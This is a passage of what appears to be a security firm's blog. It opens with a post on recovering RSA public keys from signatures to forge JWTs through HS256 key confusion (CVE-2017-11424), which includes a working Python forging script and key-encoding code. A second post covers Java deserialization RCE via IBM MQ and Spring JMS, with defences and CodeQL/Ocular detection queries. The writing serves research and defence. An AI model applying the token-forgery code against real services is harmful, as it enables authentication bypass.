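pairs = [(m, pow(m, d, n)) for m in (42, 1337, 31337)]
print(recover_modulus(pairs, e) == n)
```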

In our case, we could always recover public keys with just two signatures. At the time we had a quick and dirty implementation based on the gmpy2 library that allowed us to work with large integers and modern, efficient algorithms from Python.

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation before it struck me that the dirty little code we wrote for that custom RSA application could be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their way to users), and alg=“none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification, the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is that the symmetric verification process then uses the public key as the shared HMAC secret, so if the attacker has the RSA public key, she can forge the signature too.
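Here is what the forging side of the key confusion looks like, as a minimal Python sketch using only the standard library. The function name is hypothetical and the PEM bytes are a truncated placeholder; the attack only works if the key bytes match what the server has configured byte for byte, including line breaks.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Unpadded Base64URL, as used in the JWS compact serialization."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def forge_hs256(claims: dict, public_key_pem: bytes) -> str:
    """Build an HS256 token whose HMAC secret is the server's RSA public key."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    mac = hmac.new(public_key_pem, signing_input.encode("ascii"), hashlib.sha256)
    return signing_input + "." + b64url(mac.digest())


# Placeholder key bytes; the real attack needs the exact bytes the server uses.
pem = b"-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEA\n-----END RSA PUBLIC KEY-----\n"
print(forge_hs256({"sub": "admin"}, pem))
```

A vulnerable verifier that accepts the `alg` value from the token recomputes the same HMAC with its configured PEM bytes, so the forged token validates.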

In practice, however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

 CVE-2017-11424

To demonstrate the viability of this method, we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to keep key parameters that “look like” asymmetric keys out of symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM-encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust key filtering is; deprecating the verification API without algorithm specification is certainly the way to go.)
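The bug class is easy to model. The Python sketch below is a simplified substring blacklist in the spirit of the one described above; the marker list is an assumption for illustration, not a copy of PyJWT 1.5.0’s code. A PKCS #1 “BEGIN RSA PUBLIC KEY” header contains none of the markers, so such a key passes the check.

```python
# Simplified model of a substring blacklist for HMAC keys; the marker list is
# an assumption for illustration, not PyJWT's source.
FORBIDDEN_MARKERS = (
    b"-----BEGIN PUBLIC KEY-----",   # X.509 SubjectPublicKeyInfo PEM
    b"-----BEGIN CERTIFICATE-----",
    b"ssh-rsa",
)


def looks_asymmetric(key: bytes) -> bool:
    """Reject keys containing any known asymmetric-key marker."""
    return any(marker in key for marker in FORBIDDEN_MARKERS)


# Truncated placeholders, not valid keys.
spki_pem = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkq\n-----END PUBLIC KEY-----\n"
pkcs1_pem = b"-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEA\n-----END RSA PUBLIC KEY-----\n"
print(looks_asymmetric(spki_pem), looks_asymmetric(pkcs1_pem))  # True False
```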

Based on the documentation, RSA keys are provided to the encode/decode APIs (which also do signing and verification) as PEM-encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array based on message-signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JWS’s integer representations matches gmpy2’s.
  • Message canonicalization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL-encoded parts of tokens, so no canonicalization of delimiters, whitespace or special characters is necessary.
  • Message padding: JWS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low-level crypto APIs (finding these took me a while, until I found this CTF writeup) will provide us with standards-compliant output, without having to mess with ASN.1.
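The deterministic padding can be sketched in Java as EMSA-PKCS1-v1_5 encoding for SHA-256 as defined in RFC 8017: the bytes 0x00 0x01, a run of 0xFF bytes, 0x00, the DER DigestInfo prefix for SHA-256, then the digest itself. This is a hedged illustration rather than the author’s code (which used Python’s low-level crypto APIs); `keyBytes` is the modulus length in bytes (256 for a 2048-bit key), and the resulting integer is the m that s^e mod n must reproduce.

```java
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;

final class Pkcs1v15Sketch {
    // DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
    private static final byte[] SHA256_PREFIX = {
        0x30, 0x31, 0x30, 0x0d, 0x06, 0x09, 0x60, (byte) 0x86, 0x48, 0x01,
        0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20
    };

    // EM = 0x00 || 0x01 || FF..FF || 0x00 || DigestInfo prefix || SHA-256(signingInput)
    static byte[] encode(String signingInput, int keyBytes) {
        byte[] hash;
        try {
            hash = MessageDigest.getInstance("SHA-256")
                    .digest(signingInput.getBytes(StandardCharsets.US_ASCII));
        } catch (NoSuchAlgorithmException ex) {
            throw new IllegalStateException(ex);
        }
        int tLen = SHA256_PREFIX.length + hash.length; // 19 + 32 = 51 bytes
        if (keyBytes < tLen + 11) {
            throw new IllegalArgumentException("intended encoded message length too short");
        }
        byte[] em = new byte[keyBytes];
        em[0] = 0x00;
        em[1] = 0x01;
        int sep = keyBytes - tLen - 1; // index of the 0x00 separator after the padding
        Arrays.fill(em, 2, sep, (byte) 0xFF);
        em[sep] = 0x00;
        System.arraycopy(SHA256_PREFIX, 0, em, sep + 1, SHA256_PREFIX.length);
        System.arraycopy(hash, 0, em, sep + 1 + SHA256_PREFIX.length, hash.length);
        return em;
    }

    // Interpret EM as an unsigned big-endian integer (the value compared with s^e mod n).
    static BigInteger asInteger(byte[] em) {
        return new BigInteger(1, em);
    }
}
```

Since nothing in this encoding is randomized, the same signing input and key length always produce the same integer, which is what makes the GCD approach applicable to RS256 tokens.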

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allow little room for changes, so there is a high chance that a standards-compliant PEM file we generate will match the one at the target. For other input formats, such as JWK, flexibility can result in a large number of possible encodings of the same key, which can block exploitation.
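To illustrate how little freedom the container leaves, here is a minimal Java sketch that DER-encodes a PKCS #1 RSAPublicKey (a SEQUENCE of the INTEGERs n and e, in that order) by hand and wraps it in PEM with 64-character lines. It is a stand-in for the asn1tools-based Python code, not a copy of it, and it assumes the target file uses the “BEGIN RSA PUBLIC KEY” header, "\n" line endings and a trailing newline; any of those layout details differing from the target’s file would change the HMAC key bytes.

```java
import java.io.ByteArrayOutputStream;
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class Pkcs1PemSketch {
    // DER definite-length encoding: short form below 128, long form otherwise.
    private static void writeLength(ByteArrayOutputStream out, int len) {
        if (len < 0x80) {
            out.write(len);
            return;
        }
        byte[] lenBytes = BigInteger.valueOf(len).toByteArray();
        int offset = lenBytes[0] == 0 ? 1 : 0; // drop the sign byte, if present
        out.write(0x80 | (lenBytes.length - offset));
        out.write(lenBytes, offset, lenBytes.length - offset);
    }

    private static void writeTlv(ByteArrayOutputStream out, int tag, byte[] value) {
        out.write(tag);
        writeLength(out, value.length);
        out.write(value, 0, value.length);
    }

    // RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }
    static byte[] pkcs1Der(BigInteger n, BigInteger e) {
        ByteArrayOutputStream body = new ByteArrayOutputStream();
        // toByteArray() is minimal big-endian two's complement, i.e. DER INTEGER content.
        writeTlv(body, 0x02, n.toByteArray());
        writeTlv(body, 0x02, e.toByteArray());
        ByteArrayOutputStream seq = new ByteArrayOutputStream();
        writeTlv(seq, 0x30, body.toByteArray());
        return seq.toByteArray();
    }

    // PEM with the customary 64-character lines (layout is an assumption about the target).
    static String toPem(byte[] der) {
        String b64 = Base64.getMimeEncoder(64, "\n".getBytes(StandardCharsets.US_ASCII))
                .encodeToString(der);
        return "-----BEGIN RSA PUBLIC KEY-----\n" + b64 + "\n-----END RSA PUBLIC KEY-----\n";
    }
}
```

For a 2048-bit modulus with e = 65537 the DER starts with 30 82 01 0A 02 82 01 01 00, so the PEM body starts with the familiar “MIIBCgKCAQEA”.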

After a lot of cursing because of the bugs and insufficient documentation of the pyasn1 and asn1 packages, asn1tools finally proved usable for creating custom DER (and thus PEM) structures. The generated output matched the original public key perfectly, so I could successfully demonstrate token forgery without preliminary information about the asymmetric keys:

We tested with the 2048-bit keys from the JWS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and the algorithm produced two candidate keys for PKCS #1, which could be easily tested.

As usual, all code is available on GitHub. If you need help integrating this technique into your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard is figuring out all the implementation details that make pen-and-paper formulas work on actual computers. It won’t be a huge surprise to anyone who has worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (not to mention constantly converting between byte arrays and strings in Python3 :P). Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement, our task was to assess the security of a service built on IBM Integration Bus, an integration platform for the Java Message Service (JMS). These scary-looking enterprise buzzwords usually hide systems of varying complexity connected with Message Queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last paragraph), we opted for a white-box analysis, which allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQ’s are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post, you should read it before moving on

Our target received JMS messages using the Spring Framework. Messages were transported over IBM MQ (formerly IBM Websphere MQ); this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:


We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this saved a lot of time), and among other dynamic tests, we ran JMET against it. To our surprise, we popped a calculator in our test environment!

Now this was great, but to provide meaningful remediation advice to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and performed some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this was a framework issue – fortunately it wasn’t: the bug didn’t trigger. This narrowed the problem down to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payloads were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream and pass it back to the user, but there is a hint of something weirder in the method signature:

<T> T getBody(java.lang.Class<T> c);

The method can return objects of an arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents, twice: first for the compatibility check, then to create the return object.
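The following Java sketch is a simplified model of the decompiled behavior described above, not IBM’s code: a hypothetical `getBody` that, for an Object message body, deserializes once to check type compatibility and once more to build the return value. The `Gadget` class with a side effect in `readObject()` is a harmless stand-in for a real gadget chain, and the model throws ClassCastException where the JMS API would throw a MessageFormatException.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

final class GetBodyModel {
    // Counts how often the readObject() side effect ran.
    static int sideEffects = 0;

    static final class Gadget implements Serializable {
        private static final long serialVersionUID = 1L;

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            sideEffects++; // a real gadget chain would run attacker-chosen code here
        }
    }

    static byte[] serialize(Object o) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        } catch (IOException ex) {
            throw new UncheckedIOException(ex);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] body) {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(body))) {
            return ois.readObject();
        } catch (IOException ex) {
            throw new UncheckedIOException(ex);
        } catch (ClassNotFoundException ex) {
            throw new IllegalStateException(ex);
        }
    }

    // Model of getBody() for an Object message: the compatibility check itself
    // deserializes, so gadgets fire before the requested type is even compared.
    static <T> T getBody(byte[] objectMessageBody, Class<T> c) {
        Object probe = deserialize(objectMessageBody); // first deserialization
        if (!c.isInstance(probe)) {
            throw new ClassCastException("body is not assignable to " + c.getName());
        }
        return c.cast(deserialize(objectMessageBody)); // second deserialization
    }
}
```

Requesting `String.class` for a serialized `Gadget` still runs the side effect once before the type check fails, which is why asking for a String or byte[] offers no protection in this model.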

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly ties the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the JMS API provides the more abstract Message interface, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

public void receiveMessage(Message m) { /* Do something with m, whatever that is */ }

can become this:

public void receiveMessage(Email e) { /* Do something with an E-mail */ }

Of course, using this functionality to automatically convert messages to arbitrary Serializable objects is asking for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization I created multiple branches of IBM’s sample application, with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even if receiveMessage()’s argument is converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the class path contains appropriate gadgets).

After inspecting the code a bit more, it seems that listener implementations can’t expect received messages to be of a certain, safe type (such as TextMessage, when the application works with Strings), so they do their best to transform the incoming messages to the type expected by the developer. Additionally, when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.
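ActiveMQ’s safeguard amounts to checking classes against a trusted list before deserializing them. A comparable check can be sketched with the JDK’s own ObjectInputFilter (Java 9+, JEP 290); this is a swapped-in technique for illustration, not ActiveMQ’s or IBM MQ’s API, and the `java.lang.*;!*` policy is an arbitrary example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

final class AllowlistSketch {
    // Example policy (an assumption): accept classes in java.lang, reject all others.
    static final ObjectInputFilter FILTER =
            ObjectInputFilter.Config.createFilter("java.lang.*;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER); // must be set before the first readObject()
            return ois.readObject();
        }
    }

    // True when the filter refused a class descriptor found in the stream.
    static boolean isRejected(Object payload) {
        try {
            readFiltered(serialize(payload));
            return false;
        } catch (InvalidClassException rejected) {
            return true;
        } catch (IOException | ClassNotFoundException ex) {
            throw new IllegalStateException(ex);
        }
    }
}
```

With this policy an Integer passes, while a java.util.ArrayList (standing in for a gadget class such as commons-collections4’s TransformingComparator) is rejected with InvalidClassException as soon as its class descriptor is read, before any of its readObject() logic runs.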

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygiene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed that they “expect messaging channels to be trusted at application level”. They also agree that handling ObjectMessages is a difficult problem that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accept JMS message types that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters and expecting simple Message (or JMSMessage in case of IBM MQ) objects in the JmsListener prevents the problem, regardless of the transport implementation. Simple getters, such as getText(), can be safely used after casting. The use of even the simplest converted types, such as TextMessage, with IBM MQ is insecure! Common converters, such as the JSON-based MappingJackson2MessageConverter, need further research, as do other transports that decided not to implement countermeasures:

Patches resulting from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annotated with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL, a simple class with a characteristic predicate can be used to find appropriately annotated sources:

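import java

// Methods carrying Spring's @JmsListener annotation; their parameters are the sources
class ReceiveMessageMethod extends Method {
  ReceiveMessageMethod() {
    this.getAnAnnotation().getType().hasQualifiedName("org.springframework.jms.annotation", "JmsListener")
  }
}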

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous APIs is also reasonably simple, both in CodeQL:

// Holds when `arg` is the receiver of a getBody() call declared on a javax.jms.Message subtype
predicate isJMSGetBody(Expr arg) {
  exists(MethodAccess call, Method getbody |
    call.getMethod() = getbody and
    getbody.hasName("getBody") and
    getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
    arg = call.getQualifier()
  )
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen on the following screenshot:

With Ocular, we can also get an exhaustive list of APIs that call ObjectInputStream.readObject() for the transport implementation in use, based on the available bytecode, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for applications relying on them. Connecting paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries are soon to be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable, and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to realize that at the end of the day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to mention approving these tests. Another consequence is that message queues are often treated as inherently trusted – no one can attack a magic box whose inner workings no one (at least none of us) understands, right?

Technical security assessments can be great opportunities not only to discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible, systems. In the end, we are the ones whose job is to understand systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Tips and scripts for reconnaissance and scanning

Author: pz

Renewal paper of my GIAC Web Application Penetration Tester certification:

Tips and scripts for reconnaissance and scanning


Decrypting and analyzing HTTPS traffic without MITM

Author: dnet

Sniffing plaintext network traffic between apps and their backend APIs is an important step for pentesters to learn how they interact. In this blog post, we’ll introduce a method to simplify getting our hands on plaintext messages sent between apps running on our attacker-controlled devices and the API, and, in case of HTTPS, shoveling these requests and responses into Burp for further analysis by combining existing tools and introducing a new plugin we developed. So our approach is less of a novel attack and more of an improvement on current techniques.

Of course, nowadays, most of these channels are secured using TLS, which provides encryption, integrity protection and authenticates one or both ends of the figurative tube. In many cases, the best method to overcome this limitation is man-in-the-middle (MITM), where a special program intercepts packets and acts as a server to the client and vice versa.

For well-written applications, this doesn’t work out of the box, and how many steps must be taken to weaken the security of the testing environment for this attack to work depends on the circumstances. It started with adding MITM CA certificates to OS stores; recent operating systems require more and more obscure confirmations, and certificate pinning is gaining momentum. The latter can get to a point where there’s a big cliff: either you can defeat it with automated tools like Objection, or it becomes a daunting task where you know that it’s doable but it’s frustratingly difficult to actually do it.



Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser-known class of issues at the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.



Unix-style approach to web application testing

Author: dnet

SANS Institute accepted my GWAPT Gold Paper about Unix-style approach to web application testing, the paper is now published in the Reading Room.

The paper introduces several problems I’ve been facing while testing web applications, which converged in a common direction. Burp Suite is known by most and used by many professionals in this field, and while it’s extensible, writing such extensions has a higher barrier to entry than some project budgets would allow for a one-off throwaway tool. Our solution, Piper, is introduced through real-world examples to demonstrate its usage and show that it’s worth using. I tried to show alternatives to each subset of the functionality to stimulate critical thinking in the minds of fellow penetration testers, since this tool is not a silver bullet either. By describing the landscape thoroughly, I hope everyone can learn to pick the best tool for the job, which might or might not be Piper.

The full Gold Paper can be downloaded from the website of SANS Institute:

Unix-style approach to web application testing

The accompanying code is available on GitHub. For those who prefer video content, only have 2 minutes, or find the whole idea too abstract, we made a short demonstration of the basic features below. If you’re interested in deeper internals, there’s also a longer, 45-minute talk about it.


Wide open banking: PSD2 and us

Author: dnet

With the advent of PSD2 APIs, we had the opportunity to test some of them upon request from our clients. Although internet-facing APIs were already a thing thanks to smartphone apps, it seems that regulatory requirements and 3-way setups (customer, bank, provider) led to some surprises. Here are some of the things we found.



Patching Android apps: what could possibly go wrong

Author: dnet

Many tools are timeless: a quality screwdriver will work in ten years just as well as it did yesterday. Reverse engineering tools, on the other hand, need constant maintenance, as the technology we try to inspect with them is a moving target. We’ll show you how a simple exercise in Android reverse engineering resulted in three patches to an already up-to-date tool.
